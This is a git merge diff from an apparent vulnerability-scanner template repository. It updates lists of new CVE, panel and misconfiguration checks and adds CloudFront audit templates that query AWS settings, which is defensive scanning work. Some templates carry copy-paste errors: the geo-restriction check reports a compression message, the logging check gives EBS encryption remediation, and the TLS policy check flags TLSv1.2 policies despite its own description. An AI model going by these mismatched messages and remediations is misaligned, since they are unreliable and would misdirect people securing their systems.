Merge branch 'main' into main

2024-11-04 00:38:14 +05:30 · 2024-11-04 00:38:14 +05:30 · 6ac3899944
parent 4f386c2380 fe74a2f56b
commit 6ac3899944
256 changed files with 7801 additions and 6329 deletions
--- a/.new-additions
+++ b/.new-additions
@ -1,116 +1,23 @@
-cloud/aws/dms/dms-multi-az.yaml
+cloud/aws/cloudfront/cloudfront-compress-object.yaml
-cloud/aws/dms/dms-public-access.yaml
+cloud/aws/cloudfront/cloudfront-custom-certificates.yaml
-cloud/aws/dms/dms-version-upgrade.yaml
+cloud/aws/cloudfront/cloudfront-geo-restriction.yaml
-cloud/aws/ebs/ebs-encryption-disabled.yaml
+cloud/aws/cloudfront/cloudfront-insecure-protocol.yaml
-cloud/aws/efs/efs-encryption-disabled.yaml
+cloud/aws/cloudfront/cloudfront-integrated-waf.yaml
-cloud/aws/elasticache/cache-automatic-backups-disabled.yaml
+cloud/aws/cloudfront/cloudfront-logging-disabled.yaml
-cloud/aws/elasticache/cache-event-notification-disabled.yaml
+cloud/aws/cloudfront/cloudfront-origin-shield.yaml
-cloud/aws/elasticache/cache-redis-encryption-disabled.yaml
+cloud/aws/cloudfront/cloudfront-security-policy.yaml
-cloud/aws/elasticache/cache-redis-multiaz-disabled.yaml
+cloud/aws/cloudfront/cloudfront-traffic-unencrypted.yaml
-cloud/aws/firehose/firehose-server-destination-encryption.yaml
+cloud/aws/cloudfront/cloudfront-viewer-policy.yaml
-cloud/aws/firehose/firehose-server-side-encryption.yaml
+code/cves/2014/CVE-2014-0160.yaml
-cloud/aws/guardduty/guardduty-findings.yaml
+http/cves/2019/CVE-2019-1003000.yaml
-cloud/aws/guardduty/guardduty-not-enabled.yaml
+http/cves/2024/CVE-2024-4841.yaml
-cloud/aws/guardduty/malware-protection-disabled.yaml
+http/cves/2024/CVE-2024-6420.yaml
-cloud/aws/guardduty/s3-protection-disabled.yaml
+http/exposed-panels/cyberpanel-panel.yaml
-cloud/aws/inspector2/inspector2-disabled.yaml
+http/exposed-panels/quivr-panel.yaml
-cloud/aws/rds/rds-auto-minor-upgrade-disabled.yaml
+http/iot/ip-webcam.yaml
-cloud/aws/rds/rds-automated-backup-disabled.yaml
+http/miscellaneous/azure-blob-core-detect.yaml
-cloud/aws/rds/rds-backtrack-disabled.yaml
+http/technologies/hubble-detect.yaml
-cloud/aws/rds/rds-cluster-protection-disabled.yaml
+http/technologies/localai-detect.yaml
-cloud/aws/rds/rds-copy-snap.yaml
+http/technologies/pghero-detect.yaml
 cloud/aws/rds/rds-insights-disabled.yaml
 cloud/aws/rds/rds-instance-autoscaling-disabled.yaml
 cloud/aws/rds/rds-log-export-disabled.yaml
 cloud/aws/rds/rds-multi-az.yaml
 cloud/aws/rds/rds-public-access.yaml
 cloud/aws/route53/route53-dns-query-disabled.yaml
 cloud/aws/route53/route53-dnssec-signing-disabled.yaml
 dast/cves/2024/CVE-2024-2961.yaml
 http/cnvd/2024/CNVD-2024-38747.yaml
 http/cves/2015/CVE-2015-8562.yaml
 http/cves/2017/CVE-2017-5868.yaml
 http/cves/2018/CVE-2018-7192.yaml
 http/cves/2018/CVE-2018-7193.yaml
 http/cves/2018/CVE-2018-7196.yaml
 http/cves/2019/CVE-2019-8943.yaml
 http/cves/2021/CVE-2021-38156.yaml
 http/cves/2021/CVE-2021-45811.yaml
 http/cves/2023/CVE-2023-1315.yaml
 http/cves/2023/CVE-2023-1317.yaml
 http/cves/2023/CVE-2023-1318.yaml
 http/cves/2023/CVE-2023-2745.yaml
 http/cves/2023/CVE-2023-38040.yaml
 http/cves/2023/CVE-2023-39560.yaml
 http/cves/2023/CVE-2023-40748.yaml
 http/cves/2023/CVE-2023-40749.yaml
 http/cves/2023/CVE-2023-40750.yaml
 http/cves/2023/CVE-2023-40751.yaml
 http/cves/2023/CVE-2023-40752.yaml
 http/cves/2023/CVE-2023-40753.yaml
 http/cves/2023/CVE-2023-40755.yaml
 http/cves/2023/CVE-2023-40931.yaml
 http/cves/2023/CVE-2023-43373.yaml
 http/cves/2023/CVE-2023-5558.yaml
 http/cves/2023/CVE-2023-5561.yaml
 http/cves/2024/CVE-2016-9299.yaml
 http/cves/2024/CVE-2024-22476.yaml
 http/cves/2024/CVE-2024-32735.yaml
 http/cves/2024/CVE-2024-32736.yaml
 http/cves/2024/CVE-2024-32737.yaml
 http/cves/2024/CVE-2024-32738.yaml
 http/cves/2024/CVE-2024-32739.yaml
 http/cves/2024/CVE-2024-35584.yaml
 http/cves/2024/CVE-2024-3656.yaml
 http/cves/2024/CVE-2024-39713.yaml
 http/cves/2024/CVE-2024-43360.yaml
 http/cves/2024/CVE-2024-44349.yaml
 http/cves/2024/CVE-2024-4439.yaml
 http/cves/2024/CVE-2024-45488.yaml
 http/cves/2024/CVE-2024-46310.yaml
 http/cves/2024/CVE-2024-48914.yaml
 http/cves/2024/CVE-2024-49757.yaml
 http/cves/2024/CVE-2024-5910.yaml
 http/cves/2024/CVE-2024-8698.yaml
 http/cves/2024/CVE-2024-9061.yaml
 http/cves/2024/CVE-2024-9234.yaml
 http/cves/2024/CVE-2024-9593.yaml
 http/cves/2024/CVE-2024-9617.yaml
 http/cves/2024/CVE-2024-9796.yaml
 http/default-logins/apache/doris-default-login.yaml
 http/default-logins/sato/sato-default-login.yaml
 http/default-logins/zebra/zebra-printer-default-login.yaml
 http/exposed-panels/1password-scim-panel.yaml
 http/exposed-panels/danswer-panel.yaml
 http/exposed-panels/freescout-panel.yaml
 http/exposed-panels/nagios/nagios-logserver-panel.yaml
 http/exposed-panels/olympic-panel.yaml
 http/exposed-panels/onedev-panel.yaml
 http/exposed-panels/paloalto-expedition-panel.yaml
 http/exposed-panels/reolink-panel.yaml
 http/exposed-panels/sqlpad-panel.yaml
 http/exposed-panels/traccar-panel.yaml
 http/exposed-panels/txadmin-panel.yaml
 http/exposed-panels/usermin-panel.yaml
 http/exposed-panels/veritas-netbackup-panel.yaml
 http/exposed-panels/vmware-aria-panel.yaml
 http/misconfiguration/installer/nagios-logserver-installer.yaml
 http/misconfiguration/redpanda-console.yaml
 http/misconfiguration/root-path-disclosure.yaml
 http/misconfiguration/unauth-cyber-power-systems.yaml
 http/takeovers/wasabi-bucket-takeover.yaml
 http/technologies/accellion-detect.yaml
 http/technologies/gradio-detect.yaml
 http/technologies/lollms-webui-detect.yaml
 http/technologies/mirth-connect-detect.yaml
 http/technologies/oracle-fusion-detect.yaml
 http/technologies/salesforce-b2c-commerce-webdav.yaml
 http/technologies/wordpress/plugins/burst-statistics.yaml
-http/vulnerabilities/hcm/hcm-cloud-lfi.yaml
+http/vulnerabilities/backdoor/lottie-backdoor.yaml
 http/vulnerabilities/nagios/nagios-xi-xss.yaml
 http/vulnerabilities/other/cyberpanel-rce.yaml
 http/vulnerabilities/wordpress/application-pass-xss.yaml
 http/vulnerabilities/wordpress/wp-footnote-xss.yaml
 http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml
 http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml
 passive/cves/2024/CVE-2024-40711.yaml
--- a/README.md
+++ b/README.md
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 |    TAG    | COUNT |    AUTHOR     | COUNT | DIRECTORY  | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
-| cve       |  2773 | dhiyaneshdk   |  1420 | http       |  8042 | info     |  3887 | file |   402 |
+| cve       |  2824 | dhiyaneshdk   |  1456 | http       |  8128 | info     |  3910 | file |   402 |
-| panel     |  1212 | daffainfo     |   866 | file       |   402 | high     |  2039 | dns  |    25 |
+| panel     |  1225 | daffainfo     |   866 | file       |   402 | high     |  2069 | dns  |    25 |
-| wordpress |  1046 | dwisiswant0   |   802 | cloud      |   325 | medium   |  1742 |      |       |
+| wordpress |  1057 | dwisiswant0   |   802 | cloud      |   353 | medium   |  1784 |      |       |
-| exposure  |   997 | princechaddha |   498 | workflows  |   192 | critical |  1158 |      |       |
+| exposure  |   999 | princechaddha |   498 | workflows  |   192 | critical |  1175 |      |       |
-| xss       |   956 | ritikchaddha  |   455 | network    |   137 | low      |   280 |      |       |
+| xss       |   975 | ritikchaddha  |   479 | network    |   137 | low      |   284 |      |       |
-| wp-plugin |   915 | pussycat0x    |   452 | code       |    84 | unknown  |    43 |      |       |
+| wp-plugin |   920 | pussycat0x    |   452 | code       |    84 | unknown  |    43 |      |       |
 | osint     |   807 | pikpikcu      |   353 | javascript |    65 |          |       |      |       |
-| tech      |   729 | pdteam        |   302 | ssl        |    30 |          |       |      |       |
+| tech      |   736 | pdteam        |   302 | ssl        |    30 |          |       |      |       |
-| lfi       |   713 | ricardomaia   |   243 | dast       |    25 |          |       |      |       |
+| misconfig |   718 | ricardomaia   |   243 | dast       |    26 |          |       |      |       |
-| misconfig |   713 | geeknik       |   231 | dns        |    22 |          |       |      |       |
+| lfi       |   716 | geeknik       |   231 | dns        |    22 |          |       |      |       |
-**723 directories, 9654 files**.
+**736 directories, 9771 files**.
 </td>
 </tr>
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
--- a/TEMPLATES-STATS.md
+++ b/TEMPLATES-STATS.md
--- a/TOP-10.md
+++ b/TOP-10.md
@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT | DIRECTORY  | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
-| cve       |  2773 | dhiyaneshdk   |  1420 | http       |  8042 | info     |  3887 | file |   402 |
+| cve       |  2824 | dhiyaneshdk   |  1456 | http       |  8128 | info     |  3910 | file |   402 |
-| panel     |  1212 | daffainfo     |   866 | file       |   402 | high     |  2039 | dns  |    25 |
+| panel     |  1225 | daffainfo     |   866 | file       |   402 | high     |  2069 | dns  |    25 |
-| wordpress |  1046 | dwisiswant0   |   802 | cloud      |   325 | medium   |  1742 |      |       |
+| wordpress |  1057 | dwisiswant0   |   802 | cloud      |   353 | medium   |  1784 |      |       |
-| exposure  |   997 | princechaddha |   498 | workflows  |   192 | critical |  1158 |      |       |
+| exposure  |   999 | princechaddha |   498 | workflows  |   192 | critical |  1175 |      |       |
-| xss       |   956 | ritikchaddha  |   455 | network    |   137 | low      |   280 |      |       |
+| xss       |   975 | ritikchaddha  |   479 | network    |   137 | low      |   284 |      |       |
-| wp-plugin |   915 | pussycat0x    |   452 | code       |    84 | unknown  |    43 |      |       |
+| wp-plugin |   920 | pussycat0x    |   452 | code       |    84 | unknown  |    43 |      |       |
 | osint     |   807 | pikpikcu      |   353 | javascript |    65 |          |       |      |       |
-| tech      |   729 | pdteam        |   302 | ssl        |    30 |          |       |      |       |
+| tech      |   736 | pdteam        |   302 | ssl        |    30 |          |       |      |       |
-| lfi       |   713 | ricardomaia   |   243 | dast       |    25 |          |       |      |       |
+| misconfig |   718 | ricardomaia   |   243 | dast       |    26 |          |       |      |       |
-| misconfig |   713 | geeknik       |   231 | dns        |    22 |          |       |      |       |
+| lfi       |   716 | geeknik       |   231 | dns        |    22 |          |       |      |       |
--- a/cloud/aws/cloudfront/cloudfront-compress-object.yaml
+++ b/cloud/aws/cloudfront/cloudfront-compress-object.yaml
@ -0,0 +1,61 @@
 id: cloudfront-compress-object
 info:
  name: CloudFront Compress Objects Automatically
  author: DhiyaneshDK
  severity: low
  description: |
    Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are configured to automatically compress content for web requests that include "Accept-Encoding: gzip" in the request header, in order to increase the websites/web applications performance and reduce bandwidth costs.
  impact: |
    Disabling "Compress Objects Automatically" in CloudFront can lead to increased data transfer costs and slower page load times, negatively impacting user experience and performance.
  remediation: |
    Enable "Compress Objects Automatically" in CloudFront to reduce data transfer sizes, enhance loading speeds, and improve overall performance for end users.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/compress-objects-automatically.html
    - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/ServingCompressedFiles.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].Compress' --region $region --output text
    matchers:
      - type: word
        words:
          - "False"
    extractors:
      - type: dsl
        dsl:
          - '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
 # digest: 490a00463044022049dd48306c6c158a96f198e145cc789b3470759ea27f11f4eee8dcbcd1a02782022063234ed30fb1eb259bddcc79bef550ca731a8923594dadb47ae744ddceb508cf:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-custom-certificates.yaml
+++ b/cloud/aws/cloudfront/cloudfront-custom-certificates.yaml
@ -0,0 +1,61 @@
 id: cloudfront-custom-certificates
 info:
  name: Cloudfront Custom SSL/TLS Certificates - In Use
  author: DhiyaneshDK
  severity: medium
  description: |
    Ensure that your Amazon CloudFront distributions are configured to use a custom SSL/TLS certificate instead of the default one.
  impact: |
    Failing to use custom SSL/TLS certificates in CloudFront can result in trust issues with end users, exposing your web content to man-in-the-middle attacks and potentially damaging your brand's reputation due to untrusted connection warnings.
  remediation: |
    Configure your Amazon CloudFront distribution to use custom SSL/TLS certificates to ensure secure and trusted connections for your users, enhancing data protection and maintaining brand integrity.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-distro-custom-tls.html
    - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/CNAMEs.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution --region $region --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.CloudFrontDefaultCertificate' --output text
    matchers:
      - type: word
        words:
          - "False"
    extractors:
      - type: dsl
        dsl:
          - '"Cloudfront Custom SSL/TLS Certificates " + distribution + " In Use"'
 # digest: 4a0a00473045022100da635117b120204e1672952e41f6ee3ed6dabf0747f609179b0f67d5a69d075b02205b7689dcdc0580def61f7365313c333d14cab3be5e87ced20955c329501c674d:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-geo-restriction.yaml
+++ b/cloud/aws/cloudfront/cloudfront-geo-restriction.yaml
@ -0,0 +1,61 @@
 id: cloudfront-geo-restriction
 info:
  name: CloudFront Geo Restriction - Not Enabled
  author: DhiyaneshDK
  severity: info
  description: |
    Ensure that geographic restriction is enabled for your Amazon CloudFront CDN distributions in order to allow or block viewers from specific locations (countries) from accessing your web content.
  impact: |
    Not enabling Geo Restriction in CloudFront exposes content to users from unauthorized regions, increasing the risk of content misuse, compliance violations, and potential security threats.
  remediation: |
    Enable Geo Restriction in CloudFront to control access to content based on geographic locations, ensuring only authorized users from designated regions can access specific resources.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/geo-restriction.html
    - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/georestrictions.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution-config --id $distribution --query "DistributionConfig.Restrictions.GeoRestriction.RestrictionType" --region $region --output text
    matchers:
      - type: word
        words:
          - "none"
    extractors:
      - type: dsl
        dsl:
          - '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
 # digest: 4a0a004730450220142b520c987e8f2bcfdf0ae5bac12ebf324e825707c1ddd75291b2ff70b53f39022100ec5ac177b54af99c6215cf891d48ad55e8e7fead07e40e32ecbf13085ca6bf09:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-insecure-protocol.yaml
+++ b/cloud/aws/cloudfront/cloudfront-insecure-protocol.yaml
@ -0,0 +1,61 @@
 id: cloudfront-insecure-protocol
 info:
  name: CloudFront Insecure Origin SSL Protocols
  author: DhiyaneshDK
  severity: medium
  description: |
    Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are not using insecure SSL protocols (i.e. SSLv3) for HTTPS communication between CloudFront edge locations and custom origins.
  impact: |
    Insecure SSL protocols for CloudFront origins can expose sensitive data to interception and compromise, increasing the risk of man-in-the-middle attacks.
  remediation: |
    Configure your CloudFront distribution to enforce the use of secure SSL/TLS protocols (TLS 1.2 or higher) for all origins and disable support for outdated protocols like SSLv3 and TLS 1.0/1.1.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-insecure-origin-ssl-protocols.html
    - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginSslProtocols.Items | []' --region $region --output json
    matchers:
      - type: word
        words:
          - "SSLv3"
    extractors:
      - type: dsl
        dsl:
          - '"CloudFront Uses SSLv3 Protocol in" + distribution'
 # digest: 4b0a00483046022100fdc0ce1c8723e90fb04a9afeefa22c4a2688c89157b4f1c5c6be4a243dcf9213022100d12140b15551ef3d20a7877e4e31b370371ab0d4127a3bb56b53a6363387acd9:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-integrated-waf.yaml
+++ b/cloud/aws/cloudfront/cloudfront-integrated-waf.yaml
@ -0,0 +1,67 @@
 id: cloudfront-integrated-waf
 info:
  name: CloudFront Integrated With WAF
  author: DhiyaneshDK
  severity: medium
  description: |
    Ensure that all your Amazon CloudFront distributions are integrated with the Amazon Web Application Firewall (WAF) service to protect against application-layer attacks that can compromise the security of your websites/web applications or place unnecessary load on them
  impact: |
    Lack of integration between CloudFront and a Web Application Firewall (WAF) increases vulnerability to web-based attacks, including DDoS, SQL injection, and cross-site scripting (XSS).
  remediation: |
    Integrate CloudFront with an appropriate Web Application Firewall (WAF) to filter and monitor HTTP requests, providing enhanced protection against common web threats.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-integrated-with-waf.html
    - http://docs.aws.amazon.com/waf/latest/developerguide/what-is-aws-waf.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.WebACLId' --region $region --output json
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '""'
      - type: word
        words:
          - 'arn:'
        negative: true
    extractors:
      - type: dsl
        dsl:
          - '"CloudFront Integrated With WAF " + distribution + " is Disabled"'
 # digest: 4a0a00473045022100a36dcab2a207e696447d68b0dce85fe832262f87ce1b46b55dedec2d0d1211c902206af51e44f15794e01470f3e31dae926ca281d793cb43438e67acfa8bfa8b3525:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-logging-disabled.yaml
+++ b/cloud/aws/cloudfront/cloudfront-logging-disabled.yaml
@ -0,0 +1,61 @@
 id: cloudfront-logging-disabled
 info:
  name: Cloudfront Logging Disabled
  author: DhiyaneshDK
  severity: medium
  description: |
    Ensure that access (standard) logging is enabled for your Amazon CloudFront distributions in order to track all viewer requests for the web content delivered through the Content Delivery Network (CDN).
  impact: |
    Disabling CloudFront logging reduces visibility into traffic patterns, hinders incident response and forensic analysis, compromises compliance efforts, and limits troubleshooting capabilities, increasing security risks.
  remediation: |
    Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-logging-enabled.html
    - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/AccessLogs.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Logging.Enabled' --region $region --output text
    matchers:
      - type: word
        words:
          - "False"
    extractors:
      - type: dsl
        dsl:
          - '"Cloudfront Logging " + distribution + " is Disabled"'
 # digest: 4a0a0047304502206dc958b5b8b2f929d7f5416fe53425745b6f54d4d8d2c929f92aa508189202aa0221008b22fee11b75ecdf6da6c22803d8a6b55552f8be2910f60ce5dccf686fb892b8:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-origin-shield.yaml
+++ b/cloud/aws/cloudfront/cloudfront-origin-shield.yaml
@ -0,0 +1,61 @@
 id: cloudfront-origin-shield
 info:
  name: CloudFront Origin Shield - Not Enabled
  author: DhiyaneshDK
  severity: info
  description: |
    Ensure that the Origin Shield performance optimization feature is enabled for all your Amazon CloudFront distributions in order to help reduce the load on your distribution's origin, improve its availability, and reduce its operating costs.
  impact: |
    Not enabling CloudFront Origin Shield can lead to increased load on your origin server, higher latency, and greater costs due to more frequent requests during traffic spikes.
  remediation: |
    Enable CloudFront Origin Shield for your distributions to optimize cache efficiency, reduce load on your origin server, and improve content delivery performance during high traffic periods.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/enable-origin-shield.html
    - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/origin-shield.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.Origins.Items[*].OriginShield.Enabled' --region $region --output text
    matchers:
      - type: word
        words:
          - "False"
    extractors:
      - type: dsl
        dsl:
          - '"CloudFront Origin Shield " + distribution + " not Enabled"'
 # digest: 4a0a00473045022032e6b219a62c0fa94878575c07b5a4e05b088c8784f3ffdd724353a64d73e165022100f8a3cd82c152bd084c703fe67574a40a91c12ba1372d1cd9c4c0e4584b72a4be:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-security-policy.yaml
+++ b/cloud/aws/cloudfront/cloudfront-security-policy.yaml
@ -0,0 +1,65 @@
 id: cloudfront-security-policy
 info:
  name: CloudFront Security Policy
  author: DhiyaneshDK
  severity: medium
  description: |
    Ensure that your Amazon CloudFront distributions are using a security policy with minimum TLSv1.2 or TLSv1.3 and appropriate security ciphers for HTTPS viewer connections.
  impact: |
    Failing to use a security policy with a minimum of TLSv1.2 or TLSv1.3 and appropriate ciphers for HTTPS viewer connections in CloudFront can expose sensitive data to interception and reduce the overall security of your application.
  remediation: |
    Configure your Amazon CloudFront distributions to use a security policy that enforces a minimum of TLSv1.2 or TLSv1.3 and specifies secure ciphers for HTTPS viewer connections.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/security-policy.html
    - https://aws.amazon.com/about-aws/whats-new/2017/09/amazon-cloudfront-now-lets-you-select-a-security-policy-with-minimum-tls-v1_1-1_2-and-security-ciphers-for-viewer-connections/
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.MinimumProtocolVersion' --region $region --output json
    matchers:
      - type: word
        words:
          - '"TLSv1"'
          - '"TLSv1_2016"'
          - '"TLSv1.1_2016"'
          - '"TLSv1.2_2018"'
          - '"TLSv1.2_2019"'
    extractors:
      - type: dsl
        dsl:
          - '"CloudFront Uses Insecure Protocols " + distribution'
 # digest: 490a00463044022019cb76f463fd374301b04d91953274d0df2e3c81f325c2ca914ec8cd7292228a02206d121f3f2cb668cf74b765e168580e8d34c7367d81c680a9cea321b457a9f37e:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-traffic-unencrypted.yaml
+++ b/cloud/aws/cloudfront/cloudfront-traffic-unencrypted.yaml
@ -0,0 +1,61 @@
 id: cloudfront-traffic-unencrypted
 info:
  name: CloudFront Traffic To Origin Unencrypted
  author: DhiyaneshDK
  severity: medium
  description: |
    Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit.
  impact: |
    Unencrypted traffic between CloudFront and custom origins can expose sensitive data during transmission, leading to potential data breaches and non-compliance with encryption standards.
  remediation: |
    Ensure that all communications between your Amazon CloudFront distributions and custom origins are encrypted by configuring them to use HTTPS, thereby securing the delivery of web content and meeting compliance requirements for encryption in transit.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-traffic-to-origin-unencrypted.html
    - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html
  tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
 variables:
  region: "us-west-2"
 flow: |
  code(1)
  for(let DistributionListItemsId of iterate(template.distributions)){
    set("distribution", DistributionListItemsId)
    code(2)
  }
 self-contained: true
 code:
  - engine:
      - sh
      - bash
    source: |
      aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
    extractors:
      - type: json
        name: distributions
        internal: true
        json:
          - '.[]'
  - engine:
      - sh
      - bash
    source: |
        aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginProtocolPolicy' --region $region --output json
    matchers:
      - type: word
        words:
          - '"http-only"'
    extractors:
      - type: dsl
        dsl:
          - '"CloudFront " + distribution + " uses HTTP Only"'
 # digest: 4a0a004730450220510c7757a3c8d77dcafbd819fb087db60a3243f239bdbd580f241f16f493279002210099bb7f3694be216d0aac7e02bc4c8926ba258745185e6213f44a8695460a7cd2:922c64590222798bb761d5b6d8e72950
--- a/cloud/aws/cloudfront/cloudfront-viewer-policy.yaml
+++ b/cloud/aws/cloudfront/cloudfront-viewer-policy.yaml
@ -0,0 +1,61 @@
 id: cloudfront-viewer-policy
 info:
  name: CloudFront Viewer Protocol Policy
  author: DhiyaneshDK
  severity: medium
  description: |
    Ensure that the communication between your Amazon CloudFront distribution and its viewers is encrypted using HTTPS in order to secure the delivery of your web content.
  impact: |
    Failing to enforce HTTPS for viewer connections in CloudFront can expose web content to interception and manipulation, compromising the security and integrity of sensitive data transmitted between users and the distribution
  remediation: |
    Configure your Amazon CloudFront distribution's viewer protocol policy to either redirect HTTP requests to HTTPS or require HTTPS connections exclusively, ensuring secure delivery of web content and protecting against potential data breaches.
  reference:
    - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/viewer-protocol-policy.html
